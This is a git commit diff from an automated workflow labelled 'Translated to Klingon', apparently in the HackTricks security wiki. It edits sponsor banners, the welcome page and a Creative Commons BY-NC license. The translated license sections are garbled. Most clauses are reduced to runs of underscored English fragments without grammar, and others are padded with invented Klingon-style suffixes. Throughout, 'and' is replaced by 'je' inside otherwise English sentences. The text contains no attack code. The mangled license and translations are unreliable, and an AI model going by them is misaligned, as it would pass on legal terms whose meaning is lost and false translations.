Translated to Klingon

This commit is contained in:
Translator workflow 2024-02-10 17:52:19 +00:00
parent 116e3864db
commit b442ae90c4
708 changed files with 138327 additions and 41193 deletions

File diff suppressed because one or more lines are too long

View file

@ -24,30 +24,4 @@ dht udp "DHT Nodes"
![](<.gitbook/assets/image (273).png>) ![](<.gitbook/assets/image (273).png>)
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>) ![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1)
InfluxDB
![](<.gitbook/assets/image (337).png>)
![](<.gitbook/assets/image (338).png>)
![](<.gitbook/assets/image (339).png>)
![](<.gitbook/assets/image (340).png>)
![](<.gitbook/assets/image (341).png>)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -1,8 +1,6 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>qaStaHvIS AWS hacking vItlhutlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -19,7 +17,7 @@ Other ways to support HackTricks:
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>qaStaHvIS AWS hacking vItlhutlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -30,5 +28,3 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

View file

@ -1,5 +1,3 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
@ -65,128 +63,123 @@ j. __Share__ means to provide material to the public by any means or process tha
k. __Sui Generis Database Rights__ means rights other than copyright resulting from Directive 96/9/EC of the European Parliament and of the Council of 11 March 1996 on the legal protection of databases, as amended and/or succeeded, as well as other essentially equivalent rights anywhere in the world. k. __Sui Generis Database Rights__ means rights other than copyright resulting from Directive 96/9/EC of the European Parliament and of the Council of 11 March 1996 on the legal protection of databases, as amended and/or succeeded, as well as other essentially equivalent rights anywhere in the world.
l. __You__ means the individual or entity exercising the Licensed Rights under this Public License. Your has a corresponding meaning. l. __You__ means the individual or entity exercising the Licensed Rights under this Public License. Your has a corresponding meaning.
## Section 2 Scope. ## Section 2 Scope.
a. ___License grant.___ a. ___QaDwI'.___
1. Subject to the terms and conditions of this Public License, the Licensor hereby grants You a worldwide, royalty-free, non-sublicensable, non-exclusive, irrevocable license to exercise the Licensed Rights in the Licensed Material to: 1. ___QaDwI'___, ___Public License___ je ___terms and conditions___, ___Licensor___ ___You___ ___worldwide___, ___royalty-free___, ___non-sublicensable___, ___non-exclusive___, ___irrevocable license___ ___Licensed Rights___ ___Licensed Material___ ___exercise___:
A. reproduce and Share the Licensed Material, in whole or in part, for NonCommercial purposes only; and A. ___reproduce and Share___ ___Licensed Material___, ___whole or in part___, ___NonCommercial purposes___; ___and___
B. produce, reproduce, and Share Adapted Material for NonCommercial purposes only. B. ___produce, reproduce, and Share___ ___Adapted Material___ ___NonCommercial purposes___.
2. __Exceptions and Limitations.__ For the avoidance of doubt, where Exceptions and Limitations apply to Your use, this Public License does not apply, and You do not need to comply with its terms and conditions. 2. ___Exceptions and Limitations.___ ___Exceptions and Limitations___ ___Your use___, ___Public License___ ___apply___, ___Public License___ ___apply___, ___You___ ___need to comply___ ___terms and conditions___.
3. __Term.__ The term of this Public License is specified in Section 6(a). 3. ___Term.___ ___Public License___ ___term___ ___specified___ ___Section 6(a)___.
4. __Media and formats; technical modifications allowed.__ The Licensor authorizes You to exercise the Licensed Rights in all media and formats whether now known or hereafter created, and to make technical modifications necessary to do so. The Licensor waives and/or agrees not to assert any right or authority to forbid You from making technical modifications necessary to exercise the Licensed Rights, including technical modifications necessary to circumvent Effective Technological Measures. For purposes of this Public License, simply making modifications authorized by this Section 2(a)(4) never produces Adapted Material. 4. ___Media and formats; technical modifications allowed.___ ___Licensor___ ___exercise___ ___Licensed Rights___ ___media and formats___ ___now known___ ___hereafter created___, ___technical modifications___ ___necessary___ ___Licensor___ ___waives___ ___assert___ ___right___ ___authority___ ___forbid___ ___technical modifications___ ___necessary___ ___exercise___ ___Licensed Rights___, ___including technical modifications___ ___necessary___ ___circumvent Effective Technological Measures___. ___Public License___, ___simply making modifications authorized___ ___Section 2(a)(4)___ ___never produces Adapted Material___.
5. __Downstream recipients.__ 5. ___Downstream recipients.___
A. __Offer from the Licensor Licensed Material.__ Every recipient of the Licensed Material automatically receives an offer from the Licensor to exercise the Licensed Rights under the terms and conditions of this Public License. A. ___Offer from the Licensor Licensed Material.___ ___recipient___ ___Licensed Material___ ___automatically receives___ ___offer___ ___Licensor___ ___exercise___ ___Licensed Rights___ ___terms and conditions___ ___Public License___.
B. __No downstream restrictions.__ You may not offer or impose any additional or different terms or conditions on, or apply any Effective Technological Measures to, the Licensed Material if doing so restricts exercise of the Licensed Rights by any recipient of the Licensed Material. B. ___No downstream restrictions.___ ___You___ ___offer___ ___impose___ ___additional___ ___different terms___ ___conditions___, ___apply___ ___Effective Technological Measures___, ___Licensed Material___ ___restricts exercise___ ___Licensed Rights___ ___recipient___ ___Licensed Material___.
6. __No endorsement.__ Nothing in this Public License constitutes or may be construed as permission to assert or imply that You are, or that Your use of the Licensed Material is, connected with, or sponsored, endorsed, or granted official status by, the Licensor or others designated to receive attribution as provided in Section 3(a)(1)(A)(i). 6. ___No endorsement.___ ___Nothing___ ___Public License___ ___constitutes___ ___may be construed___ ___permission___ ___assert___ ___imply___ ___You___, ___Your use___ ___Licensed Material___, ___connected with___, ___sponsored___, ___endorsed___, ___granted official status___, ___Licensor___ ___others designated___ ___receive attribution___ ___provided___ ___Section 3(a)(1)(A)(i)___.
b. ___Other rights.___ b. ___Other rights.___
1. Moral rights, such as the right of integrity, are not licensed under this Public License, nor are publicity, privacy, and/or other similar personality rights; however, to the extent possible, the Licensor waives and/or agrees not to assert any such rights held by the Licensor to the limited extent necessary to allow You to exercise the Licensed Rights, but not otherwise. 1. ___Moral rights___, ___right of integrity___, ___licensed___ ___Public License___, ___publicity___, ___privacy___, ___and/or other similar personality rights___; ___however___, ___extent possible___, ___Licensor___ ___waives___ ___assert___ ___rights___ ___held___ ___Licensor___ ___limited extent necessary___ ___allow You___ ___exercise___ ___Licensed Rights___, ___otherwise___.
2. Patent and trademark rights are not licensed under this Public License. 2. ___Patent and trademark rights___ ___licensed___ ___Public License___.
3. To the extent possible, the Licensor waives any right to collect royalties from You for the exercise of the Licensed Rights, whether directly or through a collecting society under any voluntary or waivable statutory or compulsory licensing scheme. In all other cases the Licensor expressly reserves any right to collect such royalties, including when the Licensed Material is used other than for NonCommercial purposes. 3. ___extent possible___, ___Licensor___ ___waives___ ___right___ ___collect royalties___ ___You___ ___exercise___ ___Licensed Rights___, ___directly___ ___collecting society___ ___voluntary___ ___waivable statutory___ ___compulsory licensing scheme___. ___cases___ ___Licensor___ ___expressly reserves___ ___right___ ___collect___ ___royalties___, ___Licensed Material___ ___used___ ___NonCommercial purposes___.
## Section 3 License Conditions. ## Section 3 License Conditions.
Your exercise of the Licensed Rights is expressly made subject to the following conditions. ___Your exercise___ ___Licensed Rights___ ___expressly made subject___ ___following conditions___.
a. ___Attribution.___ a. ___Attribution.___
1. If You Share the Licensed Material (including in modified form), You must: 1. ___If You Share___ ___Licensed Material___ (___including in modified form___), ___You___:
A. retain the following if it is supplied by the Licensor with the Licensed Material: A. ___retain___ ___following___ ___supplied___ ___Licensor___ ___Licensed Material___:
i. identification of the creator(s) of the Licensed Material and any others designated to receive attribution, in any reasonable manner requested by the Licensor (including by pseudonym if designated); i. ___identification___ ___creator(s)___ ___Licensed Material___ ___others designated___ ___receive attribution___, ___reasonable manner requested___ ___Licensor___ (___including by pseudonym___ ___designated___);
ii. a copyright notice; ii. ___copyright notice___;
iii. a notice that refers to this Public License; iii. ___notice___ ___refers___ ___Public License___;
iv. a notice that refers to the disclaimer of warranties; iv. ___notice___ ___refers___ ___disclaimer of warranties___;
v. a URI or hyperlink to the Licensed Material to the extent reasonably practicable; v. ___URI or hyperlink___ ___Licensed Material___ ___extent reasonably practicable___;
B. indicate if You modified the Licensed Material and retain an indication of any previous modifications; and B. ___indicate___ ___You modified___ ___Licensed Material___ ___retain___ ___indication___ ___previous modifications___; ___and___
C. indicate the Licensed Material is licensed under this Public License, and include the text of, or the URI or hyperlink to, this Public License. C. ___indicate___ ___Licensed Material___ ___licensed___ ___Public License___, ___include___ ___text___, ___URI or hyperlink___, ___Public License___.
2. You may satisfy the conditions in Section 3(a)(1) in any reasonable manner based on the medium, means, and context in which You Share the Licensed Material. For example, it may be reasonable to satisfy the conditions by providing a URI or hyperlink to a resource that includes the required information. 2. ___You___ ___satisfy___ ___conditions___ ___Section 3(a)(1)___ ___reasonable manner___ ___medium, means, and context___ ___You Share___ ___Licensed Material___. ___example___, ___reasonable___ ___satisfy___ ___conditions___ ___providing___ ___URI or hyperlink___ ___resource___ ___includes___ ___required information___.
3. If requested by the Licensor, You must remove any of the information required by Section 3(a)(1)(A) to the extent reasonably practicable. 3. ___If requested___ ___Licensor___, ___You___ ___remove___ ___information___ ___required___ ___Section 3(a)(1)(A)___ ___extent reasonably practicable___.
4. If You Share Adapted Material You produce, the Adapter's License You apply must not prevent recipients of the Adapted Material from complying with this Public License. 4. ___If You Share___ ___Adapted Material___ ___produce___, ___Adapter's License___ ___apply___ ___prevent recipients___ ___Adapted Material___ ___comply___ ___Public License___.
## Section 4 Sui Generis Database Rights. ## Section 4 Sui Generis Database Rights.
Where the Licensed Rights include Sui Generis Database Rights that apply to Your use of the Licensed Material: ___Licensed Rights___ ___Sui Generis Database Rights___ ___apply___ ___Your use___ ___Licensed Material___:
a. for the avoidance of doubt, Section 2(a)(1) grants You the right to extract, reuse, reproduce, and Share all or a substantial portion of the contents of the database for NonCommercial purposes only; a. ___avoidance of doubt___, ___Section 2(a)(1)___ ___grants You___ ___right___ ___extract, reuse, reproduce, and Share___ ___substantial portion___ ___contents___ ___database___ ___NonCommercial purposes___;
b. if You include all or a substantial portion of the database contents in a database in which You have Sui Generis Database Rights, then the database in which You have Sui Generis Database Rights (but not its individual contents) is Adapted Material; and b. ___You___ ___include___ ___substantial portion___ ___database contents___ ___database___ ___Sui Generis Database Rights___, ___database___ ___Sui Generis Database Rights___ (___not its individual contents___) ___Adapted Material___; ___and___
c. You must comply with the conditions in Section 3(a) if You Share all or a substantial portion of the contents of the database. c. ___You___ ___comply___ ___conditions___ ___Section 3(a)___ ___You Share___ ___substantial portion___ ___contents___ ___database___.
For the avoidance of doubt, this Section 4 supplements and does not replace Your obligations under this Public License where the Licensed Rights include other Copyright and Similar Rights. ___avoidance of doubt___, ___Section 4___ ___supplements___ ___replace___ ___Your obligations___ ___Public License___ ___Licensed Rights___ ___include___ ___Copyright and Similar Rights___.
## Section 5 Disclaimer of Warranties and Limitation of Liability. ## Section 5 Disclaimer of Warranties and Limitation of Liability.
a. __Unless otherwise separately undertaken by the Licensor, to the extent possible, the Licensor offers the Licensed Material as-is and as-available, and makes no representations or warranties of any kind concerning the Licensed Material, whether express, implied, statutory, or other. This includes, without limitation, warranties of title, merchantability, fitness for a particular purpose, non-infringement, absence of latent or other defects, accuracy, or the presence or absence of errors, whether or not known or discoverable. Where disclaimers of warranties are not allowed in full or in part, this disclaimer may not apply to You.__ a. ___Unless otherwise separately undertaken___ ___Licensor___, ___extent possible___, ___Licensor___ ___offers___ ___Licensed Material___ ___as-is and as-available___, ___makes no representations or warranties___ ___kind___ ___Licensed Material___, ___express, implied, statutory___, ___other___. ___includes___, ___without limitation___, ___warranties___ ___title___, ___merchantability___, ___fitness for a particular purpose___, ___non-infringement___, ___absence of latent or other defects___, ___accuracy___, ___presence or absence___ ___errors___, ___known___ ___discoverable___. ___disclaimers___ ___warranties___ ___allowed___ ___full or in part___, ___disclaimer___ ___may not apply___ ___You___.
b. __To the extent possible, in no event will the Licensor be liable to You on any legal theory (including, without limitation, negligence) or otherwise for any direct, special, indirect, incidental, consequential, punitive, exemplary, or other losses, costs, expenses, or damages arising out of this Public License or use of the Licensed Material, even if the Licensor has been advised of the possibility of such losses, costs, expenses, or damages. Where a limitation of liability is not allowed in full or in part, this limitation may not apply to You.__ b. ___extent possible___, ___no event___ ___Licensor___ ___liable___ ___You___ ___legal theory___ (___including, without limitation___, ___negligence___) ___otherwise___ ___direct, special, indirect, incidental, consequential, punitive, exemplary___, ___other losses___, ___costs, expenses, or damages___ ___Public License___ ___use___ ___Licensed Material___, ___Licensor___ ___advised___ ___possibility___ ___losses, costs, expenses, or damages___. ___limitation of liability___ ___allowed___ ___full or in part___, ___limitation___ ___may not apply___ ___You___.
c. The disclaimer of warranties and limitation of liability provided above shall be interpreted in a manner that, to the extent possible, most closely approximates an absolute disclaimer and waiver of all liability. c. ___disclaimer___ ___warranties___ ___limitation of liability___ ___provided above___ ___interpreted___ ___manner___, ___extent possible___, ___most closely approximates___ ___absolute disclaimer___ ___waiver___ ___all liability___.
## Section 6 Term and Termination. ## Section 6 Term and Termination.
a. This Public License applies for the term of the Copyright and Similar Rights licensed here. However, if You fail to comply with this Public License, then Your rights under this Public License terminate automatically. a. ___Public License___ ___applies___ ___term___ ___Copyright and Similar Rights___ ___licensed___ ___here___. ___You___ ___fail to comply___ ___Public License___, ___Your rights___ ___Public License___ ___terminate automatically___.
b. Where Your right to use the Licensed Material has terminated under Section 6(a), it reinstates: b. ___Your right___ ___use___ ___Licensed Material___ ___terminated___ ___Section 6(a)___, ___reinstates___:
1. automatically as of the date the violation is cured, provided it is cured within 30 days of Your discovery of the violation; or 1. ___automatically___ ___date___ ___violation___ ___cured___, ___provided___ ___cured___ ___30 days___ ___Your discovery___ ___violation___; ___or___
2. upon express reinstatement by the Licensor. 2. ___express reinstatement___ ___Licensor___.
For the avoidance of doubt, this Section 6(b) does not affect any right the Licensor may have to seek remedies for Your violations of this Public License. ___avoidance of doubt___, ___Section 6(b)___ ___affect___ ___right___ ___Licensor___ ___may have___ ___seek remedies___ ___Your violations___ ___Public License___.
c. For the avoidance of doubt, the Licensor may also offer the Licensed Material under separate terms or conditions or stop distributing the Licensed Material at any time; however, doing so will not terminate this Public License. c. ___avoidance of doubt___, ___Licensor___ ___offer___ ___Licensed Material___ ___separate terms___ ___conditions___ ___stop distributing___ ___Licensed Material___ ___any time___; ___however___, ___doing so___ ___terminate___ ___Public License___.
d. Sections 1, 5, 6, 7, and 8 survive termination of this Public License.
d. ___Sections 1, 5, 6, 7, and 8___ ___survive termination___ ___Public License___.
## Section 7 Other Terms and Conditions. ## Section 7 Other Terms and Conditions.
a. The Licensor shall not be bound by any additional or different terms or conditions communicated by You unless expressly agreed. a. **Licensor** jatlhbe'chugh **You**-pu' jatlhbe'chugh **additional** je **different** tayqeq **terms** je **conditions**-pu' **bound** vItlhutlh.
b. Any arrangements, understandings, or agreements regarding the Licensed Material not stated herein are separate from and independent of the terms and conditions of this Public License. b. **Licensed Material**-pu' **arrangements**, **understandings**, je **agreements**-pu' **stated**-pu' **separate** je **independent** **terms** je **conditions**-pu' **Public License**-pu' **not**-pu' **related**.
## Section 8 Interpretation. ## Section 8 Interpretation.
a. For the avoidance of doubt, this Public License does not, and shall not be interpreted to, reduce, limit, restrict, or impose conditions on any use of the Licensed Material that could lawfully be made without permission under this Public License. a. **Avoidance**-pu' **doubt**-pu', **Public License**-pu' **not**-pu' **reduce**, **limit**, **restrict**, je **impose conditions**-pu' **Licensed Material**-pu' **use**-pu' **lawfully** **made**-pu' **permission**-pu' **Public License**-pu' **without**-pu'.
b. To the extent possible, if any provision of this Public License is deemed unenforceable, it shall be automatically reformed to the minimum extent necessary to make it enforceable. If the provision cannot be reformed, it shall be severed from this Public License without affecting the enforceability of the remaining terms and conditions. b. **Possible**-pu', **Public License**-pu' **provision**-pu' **unenforceable** **deemed**, **automatically reformed**-pu' **minimum extent necessary** **make**-pu' **enforceable**. **Provision**-pu' **reformed** **possible**, **severed**-pu' **Public License**-pu' **remaining terms** je **conditions**-pu' **enforceability**-pu' **affecting**.
c. No term or condition of this Public License will be waived and no failure to comply consented to unless expressly agreed to by the Licensor. c. **Term** je **condition**-pu' **Public License**-pu' **waived**-pu' je **failure** **comply consented**-pu' **not**-pu' **expressly agreed**-pu'.
d. Nothing in this Public License constitutes or may be interpreted as a limitation upon, or waiver of, any privileges and immunities that apply to the Licensor or You, including from the legal processes of any jurisdiction or authority.
d. **Nothing**-pu' **Public License**-pu' **constitutes** je **interpreted**-pu' **limitation upon**, je **waiver**-pu' **privileges** je **immunities**-pu' **apply**-pu' **Licensor** je **You**-pu', **including**-pu' **legal processes**-pu' **jurisdiction** je **authority**-pu'.
``` ```
Creative Commons is not a party to its public licenses. Notwithstanding, Creative Commons may elect to apply one of its public licenses to material it publishes and in those instances will be considered the “Licensor.” Except for the limited purpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the Creative Commons policies published at [creativecommons.org/policies](http://creativecommons.org/policies), Creative Commons does not authorize the use of the trademark “Creative Commons” or any other trademark or logo of Creative Commons without its prior written consent including, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other arrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this paragraph does not form part of the public licenses. Creative Commons is not a party to its public licenses. Notwithstanding, Creative Commons may elect to apply one of its public licenses to material it publishes and in those instances will be considered the “Licensor.” Except for the limited purpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the Creative Commons policies published at [creativecommons.org/policies](http://creativecommons.org/policies), Creative Commons does not authorize the use of the trademark “Creative Commons” or any other trademark or logo of Creative Commons without its prior written consent including, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other arrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this paragraph does not form part of the public licenses.
Creative Commons may be contacted at [creativecommons.org](http://creativecommons.org/). Creative Commons may be contacted at [creativecommons.org](http://creativecommons.org/).
``` ```
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
@ -200,5 +193,3 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

View file

@ -5,7 +5,7 @@
_Hacktricks logos & motion design by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ _Hacktricks logos & motion design by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
{% hint style="success" %} {% hint style="success" %}
**Welcome to the wiki where you will find each hacking trick/technique/whatever I have learnt from CTFs, real life apps, reading researches, and news.** **Qapla'! Qa'vamDI' wiki vItlhutlh Hoch hacking trick/technique/whatever jatlh CTFs, real life apps, reading researches, je news.**
{% endhint %} {% endhint %}
To get started follow this page where you will find the **typical flow** that **you should follow when pentesting** one or more **machines:** To get started follow this page where you will find the **typical flow** that **you should follow when pentesting** one or more **machines:**
@ -24,7 +24,7 @@ _Your company could be here._
<figure><img src=".gitbook/assets/stm (1).png" alt=""><figcaption></figcaption></figure> <figure><img src=".gitbook/assets/stm (1).png" alt=""><figcaption></figcaption></figure>
[**STM Cyber**](https://www.stmcyber.com) is a great cybersecurity company whose slogan is **HACK THE UNHACKABLE**. They perform their own research and develop their own hacking tools to **offer several valuable cybersecurity services** like pentesting, Red teams and training. [**STM Cyber**](https://www.stmcyber.com) is a great cybersecurity company whose slogan is **HACK THE UNHACKABLE**. They perform their own research and develop their own hacking tools to **offer several valuable cybersecurity services** like pentesting, Red teams je training.
You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stmcyber.com) You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stmcyber.com)
@ -34,7 +34,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
<figure><img src=".gitbook/assets/image (4) (1) (1) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src=".gitbook/assets/image (4) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. [**RootedCON**](https://www.rootedcon.com) is the most relevant cybersecurity event in **Spain** je one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology je cybersecurity professionals in every discipline.
{% embed url="https://www.rootedcon.com/" %} {% embed url="https://www.rootedcon.com/" %}
@ -42,9 +42,9 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
<figure><img src=".gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src=".gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
**Intigriti** is the **Europe's #1** ethical hacking and **bug bounty platform.** **Intigriti** is the **Europe's #1** ethical hacking je **bug bounty platform.**
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, je start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %} {% embed url="https://go.intigriti.com/hacktricks" %}
@ -53,7 +53,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
<figure><img src=".gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src=".gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\ \
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools. Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build je **automate workflows** powered by the world's **most advanced** community tools.
Get Access Today: Get Access Today:
@ -65,11 +65,11 @@ Get Access Today:
Stay a step ahead in the cybersecurity game. Stay a step ahead in the cybersecurity game.
[**Intruder**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) makes vulnerability management easy. Keep track of your attack surface, see where your company is vulnerable, and prioritize issues that leave your systems most exposed so you can focus on what matters most. [**Intruder**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) makes vulnerability management easy. Keep track of your attack surface, see where your company is vulnerable, je prioritize issues that leave your systems most exposed so you can focus on what matters most.
Run thousands of checks with a single platform that covers your entire tech stack from internal infrastructure to web apps, APIs and cloud systems. Integrate seamlessly with [AWS, GCP, Azure](https://www.intruder.io/cloud-vulnerability-scanning-for-aws-google-cloud-and-azure) and streamline DevOps so your team can implement fixes faster. Run thousands of checks with a single platform that covers your entire tech stack from internal infrastructure to web apps, APIs je cloud systems. Integrate seamlessly with [AWS, GCP, Azure](https://www.intruder.io/cloud-vulnerability-scanning-for-aws-google-cloud-and-azure) je streamline DevOps so your team can implement fixes faster.
Intruder never rests. Round-the-clock protection monitors your systems 24/7. Want to learn more? Visit their site and take it for a spin with [**a free trial**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). Intruder never rests. Round-the-clock protection monitors your systems 24/7. Want to learn more? Visit their site je take it for a spin with [**a free trial**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -77,18 +77,18 @@ Intruder never rests. Round-the-clock protection monitors your systems 24/7. Wan
<figure><img src=".gitbook/assets/image (5) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src=".gitbook/assets/image (5) (1).png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers je bug bounty hunters!
**Hacking Insights**\ **Hacking Insights**\
Engage with content that delves into the thrill and challenges of hacking Engage with content that delves into the thrill je challenges of hacking
**Real-Time Hack News**\ **Real-Time Hack News**\
Keep up-to-date with fast-paced hacking world through real-time news and insights Keep up-to-date with fast-paced hacking world through real-time news je insights
**Latest Announcements**\ **Latest Announcements**\
Stay informed with the newest bug bounties launching and crucial platform updates Stay informed with the newest bug bounties launching je crucial platform updates
**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! **Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) je start collaborating with top hackers today!
*** ***
@ -96,7 +96,7 @@ Stay informed with the newest bug bounties launching and crucial platform update
<figure><img src=".gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure> <figure><img src=".gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, je have fun.
{% embed url="https://pentest-tools.com/" %} {% embed url="https://pentest-tools.com/" %}
@ -106,14 +106,13 @@ Stay informed with the newest bug bounties launching and crucial platform update
[**WebSec**](https://websec.nl) is a professional cybersecurity company based in **Amsterdam** which helps **protecting** businesses **all over the world** against the latest cybersecurity threats by providing **offensive-security services** with a **modern** approach. [**WebSec**](https://websec.nl) is a professional cybersecurity company based in **Amsterdam** which helps **protecting** businesses **all over the world** against the latest cybersecurity threats by providing **offensive-security services** with a **modern** approach.
WebSec is an **all-in-one security company** which means they do it all; Pentesting, **Security** Audits, Awareness Trainings, Phishing Campagnes, Code Review, Exploit Development, Security Experts Outsourcing and much more. WebSec is an **all-in-one security company** which means they do it all; Pentesting, **Security** Audits, Awareness Trainings, Phishing Campagnes, Code Review, Exploit Development, Security Experts Outsourcing je much more.
